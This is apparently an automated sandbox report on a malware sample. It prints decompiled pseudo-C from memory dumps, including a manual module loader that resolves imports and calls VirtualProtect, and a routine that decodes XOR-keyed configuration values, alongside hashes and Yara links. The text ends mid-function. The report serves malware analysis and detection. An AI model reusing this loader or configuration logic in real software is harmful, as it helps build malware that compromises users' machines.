Uniqueness Score: -1.00%

Function 0075AB16, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0075AB16() {

				E0075ABF6(0x75c344, 0x75d124); // executed
				goto __eax;
			}

0x0075ab28
0x0075ab2f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0075AB28

Part of subcall function 0075ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0075AC6F

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 378547db8e0aa41aee9e986ee496ea0dd9bae26daf258f376003a487fc0f7f10
Instruction ID: 43f7bf5d2c3a358355f39cbf5c4ba259603e02e63e3015d3369cf5491a2587dc
Opcode Fuzzy Hash: 378547db8e0aa41aee9e986ee496ea0dd9bae26daf258f376003a487fc0f7f10
Instruction Fuzzy Hash: 03B092E1258146FC212811091D1ADBA0149C580B13320823ABC0188040A8CA5C4E0073

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE15A0, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6ECE15A0(void* __eax, intOrPtr _a4) {

				 *0x6ece41d0 =  *0x6ece41d0 & 0x00000000;
				_push(0);
				_push(0x6ece41cc);
				_push(1);
				_push(_a4);
				 *0x6ece41c8 = 0xc; // executed
				L6ECE1764(); // executed
				return __eax;
			}

0x6ece15a0
0x6ece15a7
0x6ece15a9
0x6ece15ae
0x6ece15b0
0x6ece15b4
0x6ece15be
0x6ece15c3

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6ECE10E6,00000001,6ECE41CC,00000000), ref: 6ECE15BE

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: f69d35328951b8f9af12e35bb5f816b02fca2ea794bac6e07174fbc53678d05a
Instruction ID: df649b45539b51cd996093e7be75e0a9096452301725c99cb98f7681aae968fc
Opcode Fuzzy Hash: f69d35328951b8f9af12e35bb5f816b02fca2ea794bac6e07174fbc53678d05a
Instruction Fuzzy Hash: E8C09BB4140701A7FF149F80CD45F457A71777170EF110A08F500355C0D3F510698519

Uniqueness

Uniqueness Score: -1.00%

Function 00754AAB, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00754AAB(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x75d270, 0, _a4); // executed
				return _t2;
			}

0x00754ab7
0x00754abd

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00755012,00000000,?,?,00000000), ref: 00754AB7

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5135de57dd95fc68a47ff0f9913a43b9130cc37dc98c521ac35ca5ef898af574
Instruction ID: ebb04c4684443605d82486a612ea72e66160d26a36f7b4755f7862f89adfed02
Opcode Fuzzy Hash: 5135de57dd95fc68a47ff0f9913a43b9130cc37dc98c521ac35ca5ef898af574
Instruction Fuzzy Hash: F5B012B1100300EFCE324B50DF04F49BA31F750702F00C011B308000B0C2B54820FB1E

Uniqueness

Uniqueness Score: -1.00%

Function 007575F6, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007575F6(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x75d270, 0, _a4); // executed
				return _t2;
			}

0x00757602
0x00757608

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00754F70), ref: 00757602

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e7cca182a8c3018e893d784be06e8b50bc03b93629e007102ed0e24182046e3e
Instruction ID: 97357325ea0ff64ec7780774b430006800168f87bf8ebd001b955508e65f9c7f
Opcode Fuzzy Hash: e7cca182a8c3018e893d784be06e8b50bc03b93629e007102ed0e24182046e3e
Instruction Fuzzy Hash: 9EB01271000300EFDE324B10DE08F497B31B750702F01C011B208500B0C2B54864EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 6ECE1015, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6ECE1015(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6ece41c0;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6ece41c0 - 0x69b24f45 &  !( *0x6ece41c0 - 0x69b24f45);
				_t18 = E6ECE19C2( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6ece41c0 - 0x69b24f45 &  !( *0x6ece41c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6ece41c0 - 0x69b24f45 &  !( *0x6ece41c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6ECE1798(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6ECE1DE5(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6ECE12B5(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6ECE1397(_t42);
					L8:
					return _t29;
				}
			}

0x6ece101d
0x6ece101f
0x6ece103b
0x6ece104c
0x6ece1053
0x6ece10b1
0x00000000
0x6ece1055
0x6ece1055
0x6ece105f
0x6ece1063
0x6ece1068
0x6ece106b
0x6ece1070
0x6ece1074
0x6ece1079
0x6ece107e
0x6ece1082
0x6ece1087
0x6ece1088
0x6ece108c
0x6ece1091
0x6ece1099
0x6ece1099
0x6ece1091
0x6ece1082
0x6ece1074
0x6ece109b
0x6ece10a4
0x6ece10a8
0x6ece10b2
0x6ece10b8
0x6ece10b8

APIs

Part of subcall function 6ECE19C2: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6ECE1051,?,?,?,?), ref: 6ECE19E6
Part of subcall function 6ECE19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6ECE1A08
Part of subcall function 6ECE19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6ECE1A1E
Part of subcall function 6ECE19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6ECE1A34
Part of subcall function 6ECE19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6ECE1A4A
Part of subcall function 6ECE19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6ECE1A60

Part of subcall function 6ECE1798: memcpy.NTDLL(?,?,?,?,?,?,?,?,6ECE105F,?,?,?,?,?,?), ref: 6ECE17CF
Part of subcall function 6ECE1798: memcpy.NTDLL(?,?,?), ref: 6ECE1804

Part of subcall function 6ECE1DE5: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6ECE1E1D

Part of subcall function 6ECE12B5: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6ECE12EE
Part of subcall function 6ECE12B5: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6ECE1363
Part of subcall function 6ECE12B5: GetLastError.KERNEL32 ref: 6ECE1369

GetLastError.KERNEL32(?,?,?,?,?), ref: 6ECE1093

Memory Dump Source

Source File: 00000000.00000002.644187426.000000006ECE1000.00000020.00020000.sdmp, Offset: 6ECE0000, based on PE: true

Associated: 00000000.00000002.644138464.000000006ECE0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644226108.000000006ECE3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.644252899.000000006ECE5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.644278695.000000006ECE6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: c1b4f535033d48efa54706e7702ba539c2aa361d597552bf35aeffcfeec0b375
Instruction ID: 97c78de222233324b433a45742155d20a731a435f81477cbbf81a49a0cd149f3
Opcode Fuzzy Hash: c1b4f535033d48efa54706e7702ba539c2aa361d597552bf35aeffcfeec0b375
Instruction Fuzzy Hash: A311CB76600705ABD7119BED8C94DFF77BCBFC93147000559EA0297A05FB61ED194790

Uniqueness

Uniqueness Score: -1.00%

Function 00754B28, Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00754B28(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E007563F5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x75d270, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E00751E47(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x00754b28
0x00754b30
0x00754b47
0x00754b62
0x00754b66
0x00754b6b
0x00754b6d
0x00754b7f
0x00754b8b
0x00754b6f
0x00754b6f
0x00754b74
0x00754b79
0x00754b79
0x00754b6d
0x00754b91
0x00754b95
0x00754b95
0x00754b3c
0x00754b41
0x00754b45
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00751E47: SysFreeString.OLEAUT32(00000000), ref: 00751EAA

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7519F710,?,00000000,?,00000000,?,0075506B,?,004F0053,02D29370,00000000,?), ref: 00754B8B

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 6265e10aafa38f870dd531e1b74537cd6d82c3b6f6aa02adad08fe134b2a7e68
Instruction ID: 5032a856562b945633791aab7b0652cf0e082260f901ce367ead7fe19e7aab87
Opcode Fuzzy Hash: 6265e10aafa38f870dd531e1b74537cd6d82c3b6f6aa02adad08fe134b2a7e68
Instruction Fuzzy Hash: 93012872500619FBDF229F58CC06FEA7B65EF04792F048024FE089A120D7B5C9A4EB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00754C40, Relevance: 12.3, APIs: 8, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00754C40(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t103;
				intOrPtr _t121;

				_t104 = __ecx;
				_t28 =  *0x75d2dc; // 0x69b25f44
				if(E00755657( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x75d310 = _v8;
				}
				_t33 =  *0x75d2dc; // 0x69b25f44
				if(E00755657( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x75d2dc; // 0x69b25f44
				if(E00755657( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x75d270, 0, _v16);
					goto L69;
				} else {
					_t103 = _v12;
					if(_t103 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x75d2dc; // 0x69b25f44
						_t45 = E00753BB8(_t104, _t103, _t98 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x75d278 = _v8;
						}
					}
					if(_t103 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x75d2dc; // 0x69b25f44
						_t46 = E00753BB8(_t104, _t103, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x75d27c = _v8;
						}
					}
					if(_t103 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x75d2dc; // 0x69b25f44
						_t47 = E00753BB8(_t104, _t103, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x75d280 = _v8;
						}
					}
					if(_t103 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x75d2dc; // 0x69b25f44
						_t48 = E00753BB8(_t104, _t103, _t86 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x75d004 = _v8;
						}
					}
					if(_t103 == 0) {
						_t49 = 0;
					} else {
						_t82 =  *0x75d2dc; // 0x69b25f44
						_t49 = E00753BB8(_t104, _t103, _t82 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x75d02c = _v8;
						}
					}
					if(_t103 == 0) {
						_t50 = 0;
					} else {
						_t78 =  *0x75d2dc; // 0x69b25f44
						_t50 = E00753BB8(_t104, _t103, _t78 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x75d284 = 5;
						goto L42;
					} else {
						_t104 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t103 == 0) {
								_t51 = 0;
							} else {
								_t75 =  *0x75d2dc; // 0x69b25f44
								_t51 = E00753BB8(_t104, _t103, _t75 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t72 = 0x10;
								_t73 = E007549B8(_t72);
								if(_t73 != 0) {
									_push(_t73);
									E00754B98();
								}
							}
							if(_t103 == 0) {
								_t52 = 0;
							} else {
								_t70 =  *0x75d2dc; // 0x69b25f44
								_t52 = E00753BB8(_t104, _t103, _t70 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E007549B8(0, _t52) != 0) {
								_t121 =  *0x75d364; // 0x2d295b0
								E00759311(_t121 + 4, _t68);
							}
							if(_t103 == 0) {
								_t53 = 0;
							} else {
								_t65 =  *0x75d2dc; // 0x69b25f44
								_t53 = E00753BB8(_t104, _t103, _t65 ^ 0x3df17130);
							}
							if(_t53 == 0) {
								L59:
								_t54 =  *0x75d2e0; // 0x25ca5a8
								_t22 = _t54 + 0x75e252; // 0x616d692f
								 *0x75d30c = _t22;
								goto L60;
							} else {
								_t64 = E007549B8(0, _t53);
								 *0x75d30c = _t64;
								if(_t64 != 0) {
									L60:
									if(_t103 == 0) {
										_t56 = 0;
									} else {
										_t61 =  *0x75d2dc; // 0x69b25f44
										_t56 = E00753BB8(_t104, _t103, _t61 ^ 0xd2079859);
									}
									if(_t56 == 0) {
										_t57 =  *0x75d2e0; // 0x25ca5a8
										_t23 = _t57 + 0x75e79a; // 0x6976612e
										_t58 = _t23;
									} else {
										_t58 = E007549B8(0, _t56);
									}
									 *0x75d380 = _t58;
									HeapFree( *0x75d270, 0, _t103);
									_v12 = 0;
									goto L67;
								}
								goto L59;
							}
						}
					}
				}
			}

0x00754c40
0x00754c43
0x00754c63
0x00754c71
0x00754c71
0x00754c76
0x00754c90
0x00754ef8
0x00754eff
0x00754f06
0x00754f06
0x00754c96
0x00754cb2
0x00754ee6
0x00754ef0
0x00000000
0x00754cb8
0x00754cb8
0x00754cbd
0x00754cd3
0x00754cbf
0x00754cbf
0x00754ccc
0x00754ccc
0x00754cdd
0x00754cdf
0x00754ce9
0x00754cee
0x00754cee
0x00754ce9
0x00754cf5
0x00754d0b
0x00754cf7
0x00754cf7
0x00754d04
0x00754d04
0x00754d0f
0x00754d11
0x00754d1b
0x00754d20
0x00754d20
0x00754d1b
0x00754d27
0x00754d3d
0x00754d29
0x00754d29
0x00754d36
0x00754d36
0x00754d41
0x00754d43
0x00754d4d
0x00754d52
0x00754d52
0x00754d4d
0x00754d59
0x00754d6f
0x00754d5b
0x00754d5b
0x00754d68
0x00754d68
0x00754d73
0x00754d75
0x00754d7f
0x00754d84
0x00754d84
0x00754d7f
0x00754d8b
0x00754da1
0x00754d8d
0x00754d8d
0x00754d9a
0x00754d9a
0x00754da5
0x00754da7
0x00754db1
0x00754db6
0x00754db6
0x00754db1
0x00754dbd
0x00754dd3
0x00754dbf
0x00754dbf
0x00754dcc
0x00754dcc
0x00754dd7
0x00754dea
0x00754dea
0x00000000
0x00754dd9
0x00754dd9
0x00754de3
0x00000000
0x00754df4
0x00754df4
0x00754df6
0x00754e0c
0x00754df8
0x00754df8
0x00754e05
0x00754e05
0x00754e10
0x00754e12
0x00754e15
0x00754e16
0x00754e1d
0x00754e1f
0x00754e20
0x00754e20
0x00754e1d
0x00754e27
0x00754e3d
0x00754e29
0x00754e29
0x00754e36
0x00754e36
0x00754e41
0x00754e4f
0x00754e59
0x00754e59
0x00754e60
0x00754e76
0x00754e62
0x00754e62
0x00754e6f
0x00754e6f
0x00754e7a
0x00754e8d
0x00754e8d
0x00754e92
0x00754e98
0x00000000
0x00754e7c
0x00754e7f
0x00754e84
0x00754e8b
0x00754e9d
0x00754e9f
0x00754eb5
0x00754ea1
0x00754ea1
0x00754eae
0x00754eae
0x00754eb9
0x00754ec5
0x00754eca
0x00754eca
0x00754ebb
0x00754ebe
0x00754ebe
0x00754ed8
0x00754edd
0x00754ee3
0x00000000
0x00754ee3
0x00000000
0x00754e8b
0x00754e7a
0x00754de3
0x00754dd7

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,00755390,?,69B25F44,?,00755390,69B25F44,?,00755390,69B25F44,00000005,0075D00C,00000008), ref: 00754CE5
StrToIntExA.SHLWAPI(00000000,00000000,?,00755390,?,69B25F44,?,00755390,69B25F44,?,00755390,69B25F44,00000005,0075D00C,00000008), ref: 00754D17
StrToIntExA.SHLWAPI(00000000,00000000,?,00755390,?,69B25F44,?,00755390,69B25F44,?,00755390,69B25F44,00000005,0075D00C,00000008), ref: 00754D49
StrToIntExA.SHLWAPI(00000000,00000000,?,00755390,?,69B25F44,?,00755390,69B25F44,?,00755390,69B25F44,00000005,0075D00C,00000008), ref: 00754D7B
StrToIntExA.SHLWAPI(00000000,00000000,?,00755390,?,69B25F44,?,00755390,69B25F44,?,00755390,69B25F44,00000005,0075D00C,00000008), ref: 00754DAD
StrToIntExA.SHLWAPI(00000000,00000000,?,00755390,?,69B25F44,?,00755390,69B25F44,?,00755390,69B25F44,00000005,0075D00C,00000008), ref: 00754DDF
HeapFree.KERNEL32(00000000,00755390,00755390,?,69B25F44,?,00755390,69B25F44,?,00755390,69B25F44,00000005,0075D00C,00000008,?,00755390), ref: 00754EDD
HeapFree.KERNEL32(00000000,?,00755390,?,69B25F44,?,00755390,69B25F44,?,00755390,69B25F44,00000005,0075D00C,00000008,?,00755390), ref: 00754EF0

Part of subcall function 007549B8: lstrlen.KERNEL32(69B25F44,00000000,7748D3B0,00755390,00754EC3,00000000,00755390,?,69B25F44,?,00755390,69B25F44,?,00755390,69B25F44,00000005), ref: 007549C1
Part of subcall function 007549B8: memcpy.NTDLL(00000000,?,00000000,00000001,?,00755390), ref: 007549E4
Part of subcall function 007549B8: memset.NTDLL ref: 007549F3

Memory Dump Source

Source File: 00000000.00000002.638931925.0000000000751000.00000020.00020000.sdmp, Offset: 00750000, based on PE: true

Associated: 00000000.00000002.638878437.0000000000750000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639187632.000000000075C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.639241972.000000000075D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.639332156.000000000075F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$lstrlenmemcpymemset
String ID:
API String ID: 3442150357-0
Opcode ID: 1f09e0ae3cdcc92537390fe489587a4e342214bf98c3746d5706159996bcea4d
Instruction ID: 1b7857350a09bb971e0e1721f281cccb912d5913eedd1685038327160d3b1dd0
Opcode Fuzzy Hash: 1f09e0ae3cdcc92537390fe489587a4e342214bf98c3746d5706159996bcea4d
Instruction Fuzzy Hash: B581A271B00344EFCB71EBB48D89CDB76F9BB48706B248915A805D3114EAFDDE899B24

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4E84C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,6ED4EB6A,00000002,00000000,?,?,?,6ED4EB6A,?,00000000), ref: 6ED4E8E5
GetLocaleInfoW.KERNEL32(?,20001004,6ED4EB6A,00000002,00000000,?,?,?,6ED4EB6A,?,00000000), ref: 6ED4E90E
GetACP.KERNEL32(?,?,6ED4EB6A,?,00000000), ref: 6ED4E923

Strings

ACP, xrefs: 6ED4E86A
OCP, xrefs: 6ED4E8A0

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 6ef9ddc8539dc5dd16cfa29ffe7ee36e00ee0499341a8b72cce437225e776726
Instruction ID: db19aedc34a4cfbf431df5c242cd4e0f297ac09299c0f1ddda37d67c646da0c5
Opcode Fuzzy Hash: 6ef9ddc8539dc5dd16cfa29ffe7ee36e00ee0499341a8b72cce437225e776726
Instruction Fuzzy Hash: F521B622A14201FAEFA4CBD9C901B8777B7EFA5B50B568424ED15DF184E732DD40C390

Uniqueness

Uniqueness Score: -1.00%

Function 6ED3FF15, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6ED3FF97
_free.LIBCMT ref: 6ED3FFBB
_free.LIBCMT ref: 6ED40148
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6ED7D3A8), ref: 6ED4015A
_free.LIBCMT ref: 6ED40314

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: f280abcc44fa9e67c11f80ad4618c0e15a253e38a39c78dd77c8a3c77d595db7
Instruction ID: 43728abd6a320af2e2af6e40df69f799b5a45c6121990289627b6d84b19f889f
Opcode Fuzzy Hash: f280abcc44fa9e67c11f80ad4618c0e15a253e38a39c78dd77c8a3c77d595db7
Instruction Fuzzy Hash: 0EC13871A04219DFDB118FE8C890ADE7BBEAF67394F24455AD890D7280F730CA46CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4E0A2, Relevance: 7.8, APIs: 5, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 6ED3F299: GetLastError.KERNEL32(00000000,00000000,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000,00000004), ref: 6ED3F29E
Part of subcall function 6ED3F299: SetLastError.KERNEL32(00000000,6ED8A1A0,000000FF,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000), ref: 6ED3F33C

GetACP.KERNEL32(?,?,?,?,?,?,6ED425B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6ED4E163
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6ED425B5,?,?,?,00000055,?,-00000050,?,?), ref: 6ED4E18E
_wcschr.LIBVCRUNTIME ref: 6ED4E222
_wcschr.LIBVCRUNTIME ref: 6ED4E230
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6ED4E2F1

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID:
API String ID: 4147378913-0
Opcode ID: 1967fdc39b552be62da1d2a3c2c95f58c62c825b1a6e021713a3359d224578ef
Instruction ID: 916903342b4748597d95e01c1fe50b260d51d2cebb53af1d0a90bd6124f8eed2
Opcode Fuzzy Hash: 1967fdc39b552be62da1d2a3c2c95f58c62c825b1a6e021713a3359d224578ef
Instruction Fuzzy Hash: 03710071A40206FAEB55DBF5CC85EAB73ACAF65304F10092AED59DF180EB70E94087A1

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4EA21, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 6ED3F299: GetLastError.KERNEL32(00000000,00000000,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000,00000004), ref: 6ED3F29E
Part of subcall function 6ED3F299: SetLastError.KERNEL32(00000000,6ED8A1A0,000000FF,?,6ED37CF9,?,?,00000003,?,6ED01083,6ED010F4,?,6ED00EE0,00000000,00000000,00000000), ref: 6ED3F33C

Part of subcall function 6ED3F299: _free.LIBCMT ref: 6ED3F2FB
Part of subcall function 6ED3F299: _free.LIBCMT ref: 6ED3F331

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6ED4EB2D
IsValidCodePage.KERNEL32(00000000), ref: 6ED4EB76
IsValidLocale.KERNEL32(?,00000001), ref: 6ED4EB85
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6ED4EBCD
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6ED4EBEC

Memory Dump Source

Source File: 00000000.00000002.644410383.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 49391311b8a5e2c904498469baf55b53da98f9ee57839ab627a74b5ac3fd8b3d
Instruction ID: e7ffe2e8e6fefb912f5f0ab0900eaaee69c8ad4223984dfcff44e495928b7d62
Opcode Fuzzy Hash: 49391311b8a5e2c904498469baf55b53da98f9ee57839ab627a74b5ac3fd8b3d
Instruction Fuzzy Hash: CE517C71A0021AFFEF50DFE5CC45AAAB7B8BF25304F14056AE925EB180E770D944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00754A03, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00754A03() {
				char _v264;
				void* _v300;
				int _t8;
